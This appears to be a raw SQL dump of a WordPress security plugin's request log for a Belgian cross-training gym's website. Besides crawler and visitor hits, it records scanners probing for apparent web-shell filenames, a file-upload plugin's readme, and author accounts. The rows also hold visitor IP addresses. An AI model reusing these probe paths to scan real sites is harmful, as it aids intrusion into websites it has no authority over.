(74826, 1497056342.381181, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-xmlrpc.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74827, 1497056345.895491, 1091807106, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/Xudfel.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74828, 1497056359.376216, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/dep.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74829, 1497056362.159293, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/indexx.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74830, 1497056365.730765, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/axt.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74831, 1497056370.121775, 1091807106, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/nimas.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74832, 1497056374.693903, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Dducfj.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74833, 1497056378.056515, 1091807106, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/azra.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74834, 1497056387.057158, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/language.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74835, 1497058823.531457, 1314254639, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/website-contact-form-with-file-upload/readme.txt', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0)'),
(74836, 1497061932.884909, 3065287714, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/style.css.php', 'http://crosstrainingcenter.be/wp-includes/css/style.css.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(74837, 1497068029.973453, 3475901897, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74838, 1497068030.002769, 3475901897, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74839, 1497069073.243479, 3475901784, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74840, 1497072846.846013, 2509963186, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(74841, 1497077254.306849, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/class-wp-upgrade.php', 'http://www.crosstrainingcenter.be/wp-includes/class-wp-upgrade.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(74842, 1497078947.543711, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74843, 1497078948.043618, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74844, 1497078948.536267, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74845, 1497078949.106304, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74846, 1497078949.644617, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74847, 1497078950.117514, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74848, 1497078950.573837, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74849, 1497078951.082583, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74850, 1497078951.733411, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74851, 1497078952.217269, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74852, 1497078952.699112, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74853, 1497078953.221764, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74854, 1497078953.774567, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74855, 1497078954.240261, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74856, 1497079328.021043, 2366148111, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74857, 1497079332.957439, 1570674771, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74858, 1497085501.783783, 1600959233, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74859, 1497085778.205079, 2503519569, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(74860, 1497089516.207680, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74861, 1497089516.720604, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74862, 1497089517.684122, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74863, 1497089518.239302, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74864, 1497089518.824585, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74865, 1497089519.366200, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74866, 1497089520.324069, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74867, 1497089521.977608, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(74868, 1497089522.978118, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74869, 1497089523.464582, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74870, 1497089525.567609, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74871, 1497089528.740552, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74872, 1497089529.223120, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74873, 1497089529.750256, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74874, 1497092772.183461, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74875, 1497095915.711165, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/logo_img.php', 'http://www.crosstrainingcenter.be/wp-includes/logo_img.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(74876, 1497102432.309093, 872366373, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74877, 1497102445.565929, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74878, 1497107556.307090, 758593298, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74879, 1497107561.299030, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74880, 1497107563.093739, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74881, 1497107565.870132, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74882, 1497107570.871090, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74883, 1497107581.093615, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74884, 1497107586.007890, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74885, 1497107590.801587, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74886, 1497107596.496931, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74887, 1497110902.275874, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74888, 1497111894.073937, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74889, 1497111894.354577, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74890, 1497123167.377637, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74891, 1497123167.998344, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74892, 1497123168.860394, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74893, 1497123169.428522, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74894, 1497123169.918993, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74895, 1497123170.458620, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74896, 1497123171.119321, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74897, 1497123171.673995, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74898, 1497123172.161106, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74899, 1497123172.635108, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74900, 1497123173.127224, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74901, 1497124940.839806, 2996488251, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74902, 1497124944.914385, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74903, 1497124946.363725, 621375750, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74904, 1497125853.176035, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74905, 1497127688.030278, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74906, 1497129326.524709, 3645214533, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(74907, 1497129335.452578, 3645214526, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(74908, 1497129337.039207, 3645214533, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(74909, 1497131654.306946, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74910, 1497137454.288439, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74911, 1497145734.620581, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74912, 1497147253.985790, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74913, 1497155113.097276, 786801762, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(74914, 1497156121.768394, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74915, 1497156122.711435, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74916, 1497158570.093053, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74917, 1497159815.526744, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74918, 1497162582.773603, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74919, 1497163811.977255, 3652617401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74920, 1497172746.177271, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74921, 1497176055.193513, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74922, 1497177321.490250, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(74923, 1497177756.880476, 872366346, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74924, 1497179435.623607, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74925, 1497179435.763722, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74926, 1497182758.269926, 136172254, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(74927, 1497183310.002344, 1114560586, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/ytt.php', 'http://crosstrainingcenter.be/ytt.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(74928, 1497183511.887465, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74929, 1497183512.372296, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74930, 1497183512.790764, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74931, 1497183513.226526, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74932, 1497183513.741138, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74933, 1497183514.284567, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74934, 1497183514.881100, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74935, 1497183515.338512, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74936, 1497183515.858863, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74937, 1497183516.271861, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74938, 1497183516.747221, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74939, 1497183923.166664, 2637637395, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74940, 1497187896.157272, 1374824265, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74941, 1497187906.237820, 1374824265, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74942, 1497187919.100355, 1374824265, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74943, 1497189998.239189, 1374824265, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74944, 1497190351.434349, 1570674744, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74945, 1497197289.888317, 2032808987, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(74946, 1497197291.490683, 2032808987, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=2', '', ''),
(74947, 1497197292.249461, 2032808987, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=4', '', ''),
